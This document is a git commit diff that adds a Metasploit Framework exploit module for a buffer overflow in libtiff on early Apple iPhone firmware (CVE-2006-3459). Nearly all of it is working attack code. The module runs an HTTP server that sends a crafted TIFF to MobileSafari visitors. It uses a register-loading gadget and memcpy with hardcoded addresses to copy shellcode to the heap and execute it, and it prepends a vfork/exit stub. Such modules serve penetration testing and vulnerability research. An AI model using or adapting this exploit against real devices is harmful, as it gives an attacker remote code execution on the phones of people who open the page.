First version of the iPhone libtiff exploit
git-svn-id: file:///home/svn/framework3/trunk@5144 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
21d971139b
commit
41088c3ea4
Binary file not shown.
|
@ -0,0 +1,140 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This module acts as an HTTP server
|
||||
#
|
||||
include Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the version of
|
||||
libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
|
||||
1.1.1 of the Apple iPhone. iPhones which have not had the BSD
|
||||
tools installed will need to use a special payload.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['hdm'],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-3459'],
|
||||
['OSVDB', '27723'],
|
||||
['BID', '19283']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 300,
|
||||
'BadChars' => "",
|
||||
|
||||
# Multi-threaded applications are not allowed to execve() on OS X
|
||||
# This stub injects a vfork/exit in front of the payload
|
||||
'Prepend' =>
|
||||
[
|
||||
0xe3a0c042, # vfork
|
||||
0xef000080, # sc
|
||||
0xe3500000, # cmp r0, #0
|
||||
0x1a000001, # bne
|
||||
0xe3a0c001, # exit(0)
|
||||
0xef000080 # sc
|
||||
].pack("V*")
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.02)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Stack' => 0x0055a5bc,
|
||||
'Heap' => 0x0006b400,
|
||||
'Memcpy' => 0x3009a1bc,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 01 2006'
|
||||
))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_tiff(code)
|
||||
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
|
||||
|
||||
print_status("Opening file...")
|
||||
data = File.read(path, File.size(path))
|
||||
print_status("Done...")
|
||||
|
||||
#
|
||||
# The basic idea:
|
||||
#
|
||||
# Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc}
|
||||
# This loads r0-r3 and pc from the stack, jumping to the address in pc
|
||||
# The address in pc is the real address of memcpy(), which takes
|
||||
# parameters via the r0-r3 registers. We memcpy the stack address
|
||||
# (which seems to be static across all versions) to an unused page
|
||||
# on the heap. Finally, we patch up a local variable (r6) and then
|
||||
# return back to the heap location we copied the stack to.
|
||||
#
|
||||
|
||||
dst_ptr = target['Heap']
|
||||
src_ptr = target['Stack']
|
||||
shl_len = 168 + payload.encoded.length
|
||||
|
||||
# Still some wonky characters in here, this doesn't work with alpha/english/etc
|
||||
patt = pattern_create(shl_len)
|
||||
|
||||
# 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc}
|
||||
patt[120,4] = [0x300df800].pack("V")
|
||||
|
||||
|
||||
# memcpy(r0, r1, r2)
|
||||
patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
|
||||
patt[124,4] = [dst_ptr].pack("V") # dst
|
||||
patt[128,4] = [src_ptr].pack("V") # src
|
||||
patt[132,4] = [shl_len].pack("V") # len
|
||||
|
||||
# fix up r6 to bypass an exception
|
||||
patt[112,4] = [dst_ptr + shl_len].pack("V")
|
||||
|
||||
# Return back to our copied stack data
|
||||
patt[164,4] = [dst_ptr + 168].pack("V")
|
||||
|
||||
# Stick our shellcode into the buffer
|
||||
patt[168, payload.encoded.length] = payload.encoded
|
||||
|
||||
data << patt
|
||||
data
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue